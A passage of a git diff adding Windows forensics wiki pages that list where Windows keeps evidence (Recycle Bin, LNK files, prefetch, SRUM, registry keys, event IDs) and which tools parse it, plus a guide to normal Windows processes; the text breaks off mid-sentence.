`\Users\\AppData\Local\ConnectedDevicesPlatform\\ActivitiesCache.db` +This database can be open with a SQLite tool or with the tool [**WxTCmd**](https://github.com/EricZimmerman/WxTCmd) **which generates 2 files that can be opened with the tool** [**TimeLine Explorer**](https://ericzimmerman.github.io/#!index.md). + +### ADS/Alternate Data Streams + +Files downloaded may contain the **ADS Zone.Identifier** indicating **how** was **downloaded** \(from the intranet, Internet...\) and some software \(like browser\) usually put even **more** **information** like the **URL** from where the file was downloaded. + +## **File Backups** + +### Recycle Bin + +In Vista/Win7/Win8/Win10 the **Reciclye Bin** can be found in the folder **`$Recycle.bin`** in the root of the drive \(`C:\$Reciycle.bin`\). +When a file is deleted in this folder are created 2 files: + +* `$I{id}`: File information \(date of when it was deleted} +* `$R{id}`: Content of the file + +![](../../../.gitbook/assets/image%20%28492%29.png) + +Having these files you can sue the tool [**Rifiuti**](https://github.com/abelcheung/rifiuti2) to get the original address of the deleted files and the date it was deleted \(use `rifiuti-vista.exe` for Vista – Win10\). + +```text +.\rifiuti-vista.exe C:\Users\student\Desktop\Recycle +``` + +![](../../../.gitbook/assets/image%20%28495%29%20%281%29%20%281%29.png) + +### Volume Shadow Copies + +Shadow Copy is a technology included in Microsoft Windows that can create **backup copies** or snapshots of computer files or volumes, even when they are in use. +These backups are usually located in the `\System Volume Information` from the roof of the file system and the name is composed by **UIDs** as in the following image: + +![](../../../.gitbook/assets/image%20%28522%29.png) + +Mounting the forensics image with the **ArsenalImageMounter**, the tool [**ShadowCopyView**](https://www.nirsoft.net/utils/shadow_copy_view.html) can be used to inspect a shadow copy and even **extract the files** from the shadow copy backups. + +![](../../../.gitbook/assets/image%20%28525%29.png) + +The registry entry `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\BackupRestore` contains the files and keys **to not backup**: + +![](../../../.gitbook/assets/image%20%28523%29.png) + +The registry `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS` also contains configuration information about the `Volume Shadow Copies`. + +### Office AutoSaved Files + +You can find the office autosaved files in : `C:\Usuarios\\AppData\Roaming\Microsoft{Excel|Word|Powerpoint}\` + +## Shell Items + +A shell item is an item that contains information about how to access another file. + +### Recent Documents \(LNK\) + +Windows **automatically** **creates** these **shortcuts** when the user **open, uses or creates a file** in: + +* Win7-Win10: `C:\Users\\AppData\Roaming\Microsoft\Windows\Recent\` +* Office: `C:\Users\\AppData\Roaming\Microsoft\Office\Recent\` + +When a folder is created, a link to the folder, to the parent folder and to the grandparent folder is also created. + +These automatically created link files **contain information about the origin** like if it's a **file** **or** a **folder**, **MAC** **times** of that file, **volume informatio**n of where is the file stored and **folder of the target file**. +This information can be useful to recover those files in case they were removed. + +Also, the **date created of the link** file is the first **time** the original file was **first** **used** and the **date** **modified** of the link file is the **last** **time** the origin file was used. + +To inspect these files you can use [**LinkParser**](http://4discovery.com/our-tools/). + +In this tools you will find 2 set of timestamps: **FileModifiedDate**, **FileAccessDate** and **FileCreationDate**, and **LinkModifiedDate**, **LinkAccessDate** and **LinkCreationDate**. The first set of timestamp references the **timestamps of the link file itself**. The second set references the **timestamps of the linked file**. + +You can get the same information running the Windows cli tool: [**LECmd.exe**](https://github.com/EricZimmerman/LECmd)\*\*\*\* + +```text +LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs +``` + +In this case the information is going to be saved inside a CSV file. + +### Jumplists + +These are the recent files that are indicated per application. It's the list of **recent files used by an application** that you can access on each application. + +They can be created **automatically or be custom**. + +The **jumplists** created automatically are stored in `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\`. +The jumplists are named following the format `{id}.autmaticDestinations-ms` where the initial ID is the ID of the application. + +The custom jumplists are stored in `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\CustomDestination\` and they are created by the application usually because something **important** has happened with the file \(maybe marked as favorite\) + +The **created time** of any jumplist indicates the **first time the file was accessed** and the **modified time the last time**. + +You can inspect the jumplists using [**JumplistExplorer**](https://ericzimmerman.github.io/#!index.md). + +![](../../../.gitbook/assets/image%20%28478%29.png) + +\(_Note that the timestamps provided by JumplistExplorer are related to the jumplist file itself_\) + +### Shellbags + +[**Follow this link to learn what are the shellbags.**](interesting-windows-registry-keys.md#shellbags) + +## Use of Windows USBs + +It's possible to identify that a USB device was used thanks to the creation of: + +* Windows Recent Folder +* Microsoft Office Recent Folder +* Jumplists + +Note that some LNK file instead of pointing to the original path, points to the WPDNSE folder: + +![](../../../.gitbook/assets/image%20%28487%29.png) + +The files in the folder WPDNSE are a copy of the original ones, then won't survive a restart of the PC and the GUID is taken from a shellbag. + +### Registry Information + +[Check this page to learn](interesting-windows-registry-keys.md#usb-information) which registry keys contains interesting information about USB connected devices. + +### setupapi + +Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about when the USB connection was produced \(search for `Section start`\). + +![](../../../.gitbook/assets/image%20%28477%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%283%29%20%281%29.png) + +### USB Detective + +[**USBDetective**](https://usbdetective.com/) can be used to obtain information about the USB devices that have been connected to an image. + +![](../../../.gitbook/assets/image%20%28480%29.png) + +### Plug and Play Cleanup + +The 'Plug and Play Cleanup' scheduled task is responsible for **clearing** legacy versions of drivers. It would appear \(based upon reports online\) that it also picks up **drivers which have not been used in 30 days**, despite its description stating that "the most current version of each driver package will be kept". As such, **removable devices which have not been connected for 30 days may have their drivers removed**. +The scheduled task itself is located at ‘C:\Windows\System32\Tasks\Microsoft\Windows\Plug and Play\Plug and Play Cleanup’, and its content is displayed below: + +![](https://2.bp.blogspot.com/-wqYubtuR_W8/W19bV5S9XyI/AAAAAAAANhU/OHsBDEvjqmg9ayzdNwJ4y2DKZnhCdwSMgCLcBGAs/s1600/xml.png) + +The task references 'pnpclean.dll' which is responsible for performing the cleanup activity additionally we see that the ‘UseUnifiedSchedulingEngine’ field is set to ‘TRUE’ which specifies that the generic task scheduling engine is used to manage the task. The ‘Period’ and ‘Deadline’ values of 'P1M' and 'P2M' within ‘MaintenanceSettings’ instruct Task Scheduler to execute the task once every month during regular Automatic maintenance and if it fails for 2 consecutive months, to start attempting the task during. +**This section was copied from** [**here**](https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html)**.** + +## Emails + +The emails contains **2 interesting parts: The headers and the content** of the email. In the **headers** you can find information like: + +* **Who** send the emails \(email address, IP, mail servers that has redirected the email\) +* **When** was the email sent + +Also, inside the `References` and `In-Reply-To` headers you can find the ID of the messages: + +![](../../../.gitbook/assets/image%20%28491%29.png) + +### Windows Mail App + +This application saves the emails in HTML or text. You can find the emails inside subfolders inside `\Users\\AppData\Local\Comms\Unistore\data\3\`. The emails are saved with `.dat` extension. + +The **metadata** of the emails and the **contacts** can be found inside the **EDB database**: `\Users\\AppData\Local\Comms\UnistoreDB\store.vol` + +**Change the extension** of the file from `.vol` to `.edb` and you can use the tool [ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html) to open it. Inside the `Message` table you can see the emails. + +### Microsoft Outlook + +When Exchange servers or Outlook clients are used there are going to be some MAPI headers: + +* `Mapi-Client-Submit-Time`: Time of the system when the email was sent +* `Mapi-Conversation-Index`: Number of children message of the thread and timestamp of each message of the thread +* `Mapi-Entry-ID`: Message identifier. +* `Mappi-Message-Flags` and `Pr_last_Verb-Executed`: Information about the MAPI client \(message read? no read? responded? redirected? out of the office?\) + +In the Microsoft Outlook client all the sent and received messages, contacts and calendar data is stored in a PST file in: + +* `%USERPROFILE%\Local Settings\Application Data\Microsoft\Outlook` \(WinXP\) +* `%USERPROFILE%\AppData\Local\Microsoft\Outlook` + +The registry path `HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\CurrentVersion\Windows Messagin Subsystem\Profiles\Outlook` indicates the file that is being used. + +You can open the PST file using the tool [**Kernel PST Viewer**](https://www.nucleustechnologies.com/es/visor-de-pst.html). + +![](../../../.gitbook/assets/image%20%28494%29.png) + +### Outlook OST + +When Microsoft Outlook is configured **using** **IMAP** or using an **Exchange** server, it generates a **OST** file that stores almost the same info as the PST file. It keeps the file synchronized with the server for the l**ast 12 months**, with a **max file-size of 50GB** and in the **same folder as the PST** file is saved. + +You can inspect this file using [**Kernel OST viewer**](https://www.nucleustechnologies.com/ost-viewer.html). + +### Recovering Attachments + +You may be able to find them in the folder: + +* `%APPDATA%\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook` -> IE10 +* `%APPDATA%\Local\Microsoft\InetCache\Content.Outlook` -> IE11+ + +### Thunderbird MBOX + +**Thunderbird** stores the information in **MBOX** **files** in the folder `\Users\%USERNAME%\AppData\Roaming\Thunderbird\Profiles` + +## Thumbnails + +When a user access a folder and organised it using thumbnails, then a `thumbs.db` file is created. This db **stores the thumbnails of the images** of the folder even if they are deleted. +in winXP and WIn8-8.1 this file is created automatically. In Win7/Win10, it's created automatically if it's accessed via an UNC path \(\IP\folder...\). + +It is possible to read this file with the tool [**Thumbsviewer**](https://thumbsviewer.github.io/). + +### Thumbcache + +Beginning with Windows Vista, **thumbnail previews are stored in a centralized location on the system**. This provides the system with access to images independent of their location, and addresses issues with the locality of Thumbs.db files. The cache is stored at **`%userprofile%\AppData\Local\Microsoft\Windows\Explorer`** as a number of files with the label **thumbcache\_xxx.db** \(numbered by size\); as well as an index used to find thumbnails in each sized database. + +* Thumbcache\_32.db -> small +* Thumbcache\_96.db -> medium +* Thumbcache\_256.db -> large +* Thumbcache\_1024.db -> extra large + +You can read this file using [**ThumbCache Viewer**](https://thumbcacheviewer.github.io/). + +## Windows Registry + +The Windows Registry Contains a lot of **information** about the **system and the actions of the users**. + +The files containing the registry are located in: + +* %windir%\System32\Config\*_SAM\*_: `HKEY_LOCAL_MACHINE` +* %windir%\System32\Config\*_SECURITY\*_: `HKEY_LOCAL_MACHINE` +* %windir%\System32\Config\*_SYSTEM\*_: `HKEY_LOCAL_MACHINE` +* %windir%\System32\Config\*_SOFTWARE\*_: `HKEY_LOCAL_MACHINE` +* %windir%\System32\Config\*_DEFAULT\*_: `HKEY_LOCAL_MACHINE` +* %UserProfile%{User}\*_NTUSER.DAT\*_: `HKEY_CURRENT_USER` + +From Windows Vista and Windows 2008 Server upwards there are some backups of the `HKEY_LOCAL_MACHINE` registry files in **`%Windir%\System32\Config\RegBack\`**. +Also from these versions, the registry file **`%UserProfile%\{User}\AppData\Local\Microsoft\Windows\USERCLASS.DAT`** is created saving information about program executions. + +### Tools + +Some tools are useful to analyzed the registry files: + +* **Registry Editor**: It's installed in Windows. It's a GUI to navigate through the Windows registry of the current session. +* [**Registry Explorer**](https://ericzimmerman.github.io/#!index.md): It allows to load the registry file and navigate through them with a GUI. It also contains Bookmarks highlighting keys with interesting information. +* [**RegRipper**](https://github.com/keydet89/RegRipper3.0): Again, it has a GUI that allows to navigate through the loaded registry and also contains plugins that highlight interesting information inside the loaded registry. +* [**Windows Registry Recovery**](https://www.mitec.cz/wrr.html): Another GUI application capable of extracting the important information from the registry loaded. + +### Recovering Deleted Element + +When a key is deleted it's marked as such but until the space it's occupying is needed it won't be removed. Therefore, using tools like **Registry Explorer** it's possible to recover these deleted keys. + +### Last Write Time + +Each Key-Value contains a **timestamp** indicating the last time it was modified. + +### SAM + +The file/hive **SAM** contains the **users, groups and users passwords** hashes of the system. +In `SAM\Domains\Account\Users` you can obtain the username, the RID, last logon, last failed logon, login counter, password policy and when the account was created. In order to get the **hashes** you also **need** the file/hive **SYSTEM**. + +### Interesting entries in the Windows Registry + +{% page-ref page="interesting-windows-registry-keys.md" %} + +## Programs Executed + +### Basic Windows Processes + +in the following page you can learn about the basic Windows processes to detect suspicious behaviours: + +{% page-ref page="windows-processes.md" %} + +### Windows RecentAPPs + +Inside the registry `NTUSER.DAT` in the path `Software\Microsoft\Current Version\Search\RecentApps` you can subkeys with information about the **application executed**, **last time** it was executed, and **number of times** it was launched. + +### BAM + +You can open the `SYSTEM` file with a registry editor and inside the path `SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}` you can find the information about the **applications executed by each user** \(note the `{SID}` in the path\) and at **what time** they were executed \(the time is inside the Data value of the registry\). + +### Windows Prefetch + +Prefetching is a technique that allows a computer to silently **fetch the necessary resources needed to display content** that a user **might access in the near future** so resources can be accessed in less time. + +Windows prefetch consist on creating **caches of the executed programs** in order to be able to load them faster. These caches as created as `.pf` files inside the path: `C:\Windows\Prefetch`. +there is a limit of 128 files in XP/VISTA/WIN7 and 1024 files in Win8/Win10. + +The file name is created as `{program_name}-{hash}.pf` \(the hash is based on the path and arguments of the executable\). In W10 these files are compressed. +Note that the sole presence of the file indicates that **the program was executed** at some point. + +The file `C:\Windows\Prefetch\Layout.ini` contains the **names of the folders of the files that are prefetched**. This file contains **information about the number of the executions**, **dates** of the execution and **files** **open** by the program. + +To inspect these files you can use the tool [**PEcmd.exe**](https://github.com/EricZimmerman/PECmd): + +```bash +.\PECmd.exe -d C:\Users\student\Desktop\Prefetch --html "C:\Users\student\Desktop\out_folder" +``` + +![](../../../.gitbook/assets/image%20%28496%29.png) + +### Superprefetch + +**Superprefetch** has the same goal as prefetch, **load programs faster** by predicting what is going to be loaded next. However, it doesn't substitute the prefetch service. +This service will generate database files in `C:\Windows\Prefetch\Ag*.db`. + +In these databases you can find the **name** of the **program**, **number** of **executions**, **files** **opened**, **volume** **accessed**, **complete** **path**, **timeframes** and **timestamps**. + +You can access this information using the tool [**CrowdResponse**](https://www.crowdstrike.com/resources/community-tools/crowdresponse/). + +### SRUM + +**System Resource Usage Monitor** \(SRUM\) **monitors** the **resources** **consumed** **by a process**. It appeared in W8 and it stores the data en an ESE database located in `C:\Windows\System32\sru\SRUDB.dat`. + +It gives the information: + +* AppID and Path +* User that executed the process +* Sent Bytes +* Received Bytes +* Network Interface +* Connection duration +* Process duration + +This information is updated every 60mins. + +You can obtain the date from this file using the tool [**srum\_dump**](https://github.com/MarkBaggett/srum-dump). + +```bash +.\srum_dump.exe -i C:\Users\student\Desktop\SRUDB.dat -t SRUM_TEMPLATE.xlsx -o C:\Users\student\Desktop\srum +``` + +### AppCompatCache \(ShimCache\) + +**Shimcache**, also known as **AppCompatCache**, is a component of the **Application Compatibility Database**, which was created by **Microsoft** and used by the operating system to identify application compatibility issues. + +The cache stores various file metadata depending on the operating system, such as: + +* File Full Path +* File Size +* **$Standard\_Information** \(SI\) Last Modified time +* Shimcache Last Updated time +* Process Execution Flag + +This information can be found in the registry in: + +* `SYSTEM\CurrentControlSet\Control\SessionManager\Appcompatibility\AppcompatCache` + * XP \(96 entries\) +* `SYSTEM\CurrentControlSet\Control\SessionManager\AppcompatCache\AppCompatCache` + * Server 2003 \(512 entries\) + * 2008/2012/2016 Win7/Win8/Win10 \(1024 entries\) + +You can use the tool [**AppCompatCacheParser**](https://github.com/EricZimmerman/AppCompatCacheParser) to parse this information. + +![](../../../.gitbook/assets/image%20%28497%29.png) + +### Amcache + +The **Amcache.hve** file is a registry file that stores the information of executed applications. It's located in `C:\Windows\AppCompat\Programas\Amcache.hve` + +**Amcache.hve** records the recent processes that were run and lists the path of the files that’s executed which can then be used to find the executed program. It also record the SHA1 of the program. + +You can parse this information with the tool [**Amcacheparser**](https://github.com/EricZimmerman/AmcacheParser) + +```bash +AmcacheParser.exe -f C:\Users\student\Desktop\Amcache.hve --csv C:\Users\student\Desktop\srum +``` + +The most interesting CVS file generated if the `Amcache_Unassociated file entries`. + +### RecentFileCache + +This artifact can only be found in W7 in `C:\Windows\AppCompat\Programs\RecentFileCache.bcf` and it contains information about the recent execution of some binaries. + +You can use the tool [**RecentFileCacheParse**](https://github.com/EricZimmerman/RecentFileCacheParser) to parse the file. + +### Scheduled tasks + +You can extract them from `C:\Windows\Tasks` or `C:\Windows\System32\Tasks` and read them as XML. + +### Services + +You can find them in the registry under `SYSTEM\ControlSet001\Services`. You can see what is going to be executed and when. + +### **Windows Store** + +The installed applications can be found in `\ProgramData\Microsoft\Windows\AppRepository\` +This repository has a **log** with **each application installed** in the system inside the database **`StateRepository-Machine.srd`**. + +Inside the Application table of this database it's possible to find the columns: "Application ID", "PackageNumber", and "Display Name". This columns have information about pre-installed and installed applications and it can be found if some applications were uninstalled because the IDs of installed applications should be sequential. + +It's also possible to **find installed application** inside the registry path: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Applications\` +And **uninstalled** **applications** in: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Deleted\` + +## Windows Events + +Information that appears inside Windows events: + +* What happened +* Timestamp \(UTC + 0\) +* Users involved +* Hosts involved \(hostname, IP\) +* Assets accessed \(files, folder, printer, services\) + +The logs are located in `C:\Windows\System32\config` before Windows Vista and in `C:\Windows\System32\winevt\Logs` after Windows Vista. + +Before Windows Vista the event logs were in binary format and after it, they are in **XML format** and use the **.evtx** extension. + +The location of the event files can be found in the SYSTEM registry in **`HKLM\SYSTEM\CurrentControlSet\services\EventLog\{Application|System|Security}`** + +They can be visualized from the Windows Event Viewer \(**`eventvwr.msc`**\) or with other tools like [**Event Log Explorer**](https://eventlogxp.com/)**.** + +### Security + +These event register the accesses and give information about the security configuration. +they can be found in `C:\Windows\System32\winevt\Security.evtx`. + +The **max size** of the event file is configurable, and it will start overwriting old events when the maximum size is reached. + +Events that are registered: + +* Login/Logoff +* Actions of the user +* Access to files, folders and shared assets +* Modification of the security configuration + +Events related to the user authentication: + +| EventID | Description | +| :--- | :--- | +| 4624 | Successful authentication | +| 4625 | Authentication error | +| 4634/4647 | log off | +| 4672 | Logon with admin permissions | + +Inside the EventID 4634/4647 there are interesting sub-types: + +* **2 \(interactive\)**: The login was interactive using the keyboard or software like VNC or `PSexec -U-` +* **3 \(network\)**: Connection to a shared folder +* **4 \(Batch\)**: Process executed +* **5 \(service\)**: Service started by the Service Control Manager +* **7**: Screen unblocked using password +* **8 \(network cleartext\)**: User authenticated sendin clear text passwords. This event use to come from the IIS +* **9 \(new credentials\)**: It's generated when the command `RunAs` is used or the user access to a network service with different credentials. +* **10 \(remote interactive\)**: Authentication via Terminal Services or RDP +* **11 \(cache interactive\)**: Access using the last cached credentials because it wasn't possible to contact the domain controller + +The Status and sub status information of the event s can indicate more details about the causes of the event. For example take a look to the following Status and Sub Status Codes of the Event ID 4625: + +![](../../../.gitbook/assets/image%20%28455%29.png) + +### Recovering Windows Events + +It's highly recommended to turn off the suspicious PC by **unplugging it** to maximize the probabilities of recovering the Windows Events. In case they were deleted, a tool that can be useful to try to recover them is [**Bulk\_extractor**](../partitions-file-systems-carving/file-data-carving-recovery-tools.md#bulk-extractor) indicating the **evtx** extension. + +## Identifying Common Attacks with Windows Events + +### Brute-Force Attack + +A brute-force attack can be easily identifiable because **several EventIDs 4625 will appear**. **If** the attack was **successful**, after the EventIDs 4625, **an EventID 4624 will appear**. + +### Time Change + +This is awful for the forensics team as all the timestamps will be modified. +This event is recorded by the EventID 4616 inside the Security Event log. + +### USB devices + +The following System EventIDs are useful: + +* 20001 / 20003 / 10000: First time it was used +* 10100: Driver update + +The EventID 112 from DeviceSetupManager contains the timestamp of each USB device inserted. + +### Turn Off / Turn On + +The ID 6005 of the "Event Log" service indicates the PC was turned On. The ID 6006 indicates it was turned Off. + +### Logs Deletion + +The Security EventID 1102 indicates the logs were deleted. + diff --git a/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md b/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md new file mode 100644 index 00000000000..8a826390a67 --- /dev/null +++ b/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md @@ -0,0 +1,177 @@ +# Interesting Windows Registry Keys + +## **Windows system info** + +### Version + +* **`Software\Microsoft\Windows NT\CurrentVersion`**: Windows version, Service Pack, Installation time and the registered owner + +### Hostname + +* **`System\ControlSet001\Control\ComputerName\ComputerName`**: Hostname + +### Timezone + +* **`System\ControlSet001\Control\TimeZoneInformation`**: TimeZone + +### Last Access Time + +* **`System\ControlSet001\Control \Filesystem`**: Last time access \(by default it's disabled with `NtfsDisableLastAccessUpdate=1`, if `0`, then, it's enabled\). + * To enable it: `fsutil behavior set disablelastaccess 0` + +### Shutdown Time + +* `System\ControlSet001\Control\Windows`: Shutdown time +* `System\ControlSet001\Control\Watchdog\Display`: Shutdown count \(only XP\) + +### Network Information + +* **`System\ControlSet001\Services\Tcpip\Parameters\Interfaces{GUID_INTERFACE}`**: Network interfaces +* **`Software\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\Unmanaged` & `Software\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\Managed` & `Software\Microsoft\Windows NT\CurrentVersion\NetworkList\Nla\Cache`**: First and last time a network connection was performed and connections through VPN +* **`Software\Microsoft\WZCSVC\Parameters\Interfaces{GUID}` \(for XP\) & `Software\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles`**: Network type \(0x47-wireless, 0x06-cable, 0x17-3G\) an category \(0-Public, 1-Private/Home, 2-Domain/Work\) and last connections + +### Shared Folders + +* **`System\ControlSet001\Services\lanmanserver\Shares\`**: Share folders and their configurations. If **Client Side Caching** \(CSCFLAGS\) is enabled, then, a copy of the shared files will be saved in the clients and server in `C:\Windows\CSC` + * CSCFlag=0 -> By default the user needs to indicate the files that he wants to cache + * CSCFlag=16 -> Automatic caching documents. “All files and programs that users open from the shared folder are automatically available offline” with the “optimize for performance" unticked. + * CSCFlag=32 -> Like the previous options by “optimize for performance” is ticked + * CSCFlag=48 -> Cache is disabled. + * CSCFlag=2048: This setting is only on Win 7 & 8 and is the default setting until you disable “Simple file sharing” or use the “advanced” sharing option. It also appears to be the default setting for the “Homegroup” + * CSCFlag=768 -> This setting was only seen on shared Print devices. + +### AutoStart programs + +* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run` +* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\RunOnce` +* `Software\Microsoft\Windows\CurrentVersion\Runonce` +* `Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run` +* `Software\Microsoft\Windows\CurrentVersion\Run` + +### Explorer Searches + +* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\WordwheelQuery`: What the user searched for using explorer/helper. The item with `MRU=0` is the last one. + +### Typed Paths + +* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths`: Paths types in the explorer \(only W10\) + +### Recent Docs + +* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs`: Recent documents opened by the user +* `NTUSER.DAT\Software\Microsoft\Office{Version}{Excel|Word}\FileMRU`:Recent office docs. Versions: + * 14.0 Office 2010 + * 12.0 Office 2007 + * 11.0 Office 2003 + * 10.0 Office X +* `NTUSER.DAT\Software\Microsoft\Office{Version}{Excel|Word} UserMRU\LiveID_###\FileMRU`: Recent office docs. Versions: + * 15.0 office 2013 + * 16.0 Office 2016 + +### MRUs + +* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU` +* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LasVisitedPidlMRU` + +Indicates the path from where the executable was executed + +* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\Op enSaveMRU` \(XP\) +* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\Op enSavePidlMRU` + +Indicates files opened inside an opened Window + +### Last Run Commands + +* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU` +* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\Policies\RunMR` + +### User AssistKey + +* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count` + +The GUID is the id of the application. Data saved: + +* Last Run Time +* Run Count +* GUI application name \(this contains the abs path and more information\) +* Focus time and Focus name + +## Shellbags + +When you open a directory Windows saves data about how to visualize the directory in the registry. These entries are known as Shellbags. + +Explorer Access: + +* `USRCLASS.DAT\Local Settings\Software\Microsoft\Windows\Shell\Bags` +* `USRCLASS.DAT\Local Settings\Software\Microsoft\Windows\Shell\BagMRU` + +Desktop Access: + +* `NTUSER.DAT\Software\Microsoft\Windows\Shell\BagMRU` +* `NTUSER.DAT\Software\Microsoft\Windows\Shell\Bags` + +To analyze the Shellbags you can use [**Shellbag Explorer**](https://ericzimmerman.github.io/#!index.md) **\*\*and you will be able to find the** MAC time of the folder **and also the** creation date and modified date of the shellbag **which are related with the** first time the folder was accessed and the last time\*\*. + +Note 2 things from the following image: + +1. We know the **name of the folders of the USB** that was inserted in **E:** +2. We know when the **shellbag was created and modified** and when the folder was created an accessed + +![](../../../.gitbook/assets/image%20%28475%29.png) + +## USB information + +### Device Info + +The registry `HKLM\SYSTEM\ControlSet001\Enum\USBSTOR` monitors each USB device that has been connected to the PC. +Within this registry it's possible to find: + +* The manufacturer's name +* The product name and version +* The Device Class ID +* The volume name \(in the following images the volume name is the highlighted subkey\) + +![](../../../.gitbook/assets/image%20%28489%29.png) + +![](../../../.gitbook/assets/image%20%28479%29%20%281%29.png) + +Moreover, checking the registry `HKLM\SYSTEM\ControlSet001\Enum\USB` and comparing the values of the sub-keys it's possible to find the VID value + +![](../../../.gitbook/assets/image%20%28476%29.png) + +With the previous information the registry `SOFTWARE\Microsoft\Windows Portable Devices\Devices` can be used to obtain the **`{GUID}`**: + +![](../../../.gitbook/assets/image%20%28486%29.png) + +### User that used the device + +Having the **{GUID}** of the device it's now possible to **check all the NTUDER.DAT hives of all the users** searching for the GUID until you find it in one of them \(`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\Mountpoints2`\) + +![](../../../.gitbook/assets/image%20%28485%29.png) + +### Last mounted + +Checking the registry `System\MoutedDevices` it's possible to find out **which device was the last one mounted**. In the following image check how the last device mounted in `E:` is the Thoshiba one \(using the tool Registry Explorer\). + +![](../../../.gitbook/assets/image%20%28483%29%20%281%29.png) + +### Volume Serial Number + +In `Software\Microsoft\Windows NT\CurrentVersion\EMDMgmt` you can find the volume serial number. **Knowing the volume name and the volume serial number you can correlate the information** from LNK files that uses that information. + +Note that when a USB device is formatted: + +* A new volume name is created +* A new volume serial number is created +* The physical serial number is kept + +### Timestamps + +In `System\ControlSet001\Enum\USBSTOR{VEN_PROD_VERSION}{USB serial}\Properties{83da6326-97a6-4088-9453-a1923f573b29}\` you can find the first and last time the device was connected: + +* 0064 -- First connection +* 0066 -- Last connection +* 0067 -- Disconnection + +![](../../../.gitbook/assets/image%20%28488%29.png) + diff --git a/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md b/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md new file mode 100644 index 00000000000..1653202911a --- /dev/null +++ b/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md @@ -0,0 +1,93 @@ +# Windows Processes + +### smss.exe + +It's called **Session Manager**. +Session 0 starts **csrss.exe** and **wininit.exe** \(**OS** **services**\) while Session 1 starts **csrss.exe** and **winlogon.exe** \(**User** **session**\). However, you should see **only one process** of that **binary** without children in the processes tree. +Also, more sessions apart from 0 and 1 may mean that RDP sessions are occurring. + +### csrss.exe + +Is the **Client/Server Run Subsystem Process**. +It manages **processes** and **threads**, makes the **Windows** **API** available for other processes and also **maps** **drive** **letters**, create **temp** **files** and handles the **shutdown** **process**. +There is one **running in Session 0 and another one in Session 1** \(so **2 processes** in the processes tree\). +Another one is created **per new Session**. + +### winlogon.exe + +This is Windows Logon Process. +It's responsible for user **logon**/**logoffs**. +It launches **logonui.exe** to ask for username and password and then calls **lsass.exe** to verify them. +Then it launches **userinit.exe** which is specified in **`HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon`** with key **Userinit**. +Mover over, the previous registry should have **explorer.exe** in the **Shell key** or it might be abused as a **malware persistence method**. + +### wininit.exe + +This is the **Windows Initialization Process**. It launches **services.exe**, **lsass.exe** and **lsm.exe** in Session 0. +There should only be 1 process. + +### userinit.exe + +Load the **ntduser.dat in HKCU** and initialises the **user** **environment** and runs **logon** **scripts** and **GPO**. +It launches **explorer.exe**. + +### lsm.exe + +This is the **Local Session Manager**. +It works with smss.exe to manipulate use sessions: Logon/logoff, shell start, lock/unlock desktop... +After W7 lsm.exe was transformed into a service \(lsm.dll\). +There should only be 1 process in W7 and from them a service running the DLL. + +### services.exe + +This is the **Service Control Manager**. +It **loads** **services** configured as **auto-start** and **drivers**. + +It's the parent process of **svchost.exe**, **dllhost.exe**, **taskhost.exe**, **spoolsv.exe** and many more. +Note that services are defined in `HKLM\SYSTEM\CurrentControlSet\Services` and this process maintains a DB in memory of service info that can be queried by sc.exe. + +Note how **some** **services** are going to be running in a **process of their own** and others are going to be **sharing a svchost.exe process**. + +There should only be 1 process. + +### lsass.exe + +This the **Local Security Authority Subsystem**. +It's responsible for the user **authentication** and create the **security** **tokens**. It uses authentication packages located in `HKLM\System\CurrentControlSet\Control\Lsa`. +It writes to the **Security** **event** **log**. +There should only be 1 process. +Keep in mind that this process is highly attacked to dump passwords. + +### svchost.exe + +This is the **Generic Service Host Process**. +It hosts multiple DLL services in one shared process. +Usually you will find that **svchost.exe** is launched with `-k` flag. This will launch a query to the registry **HKEY\_LOCAL\_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost** where there will be a key with the argument mentioned in -k that will contain the services to launch in the same process. + +For example: `-k UnistackSvcGroup` will launch: `PimIndexMaintenanceSvc MessagingService WpnUserService CDPUserSvc UnistoreSvc UserDataSvc OneSyncSvc` + +If the **flag `-s`** is also used with an argument, then svchost is asked to **only launch the specified service** in this argument. + +There will be several 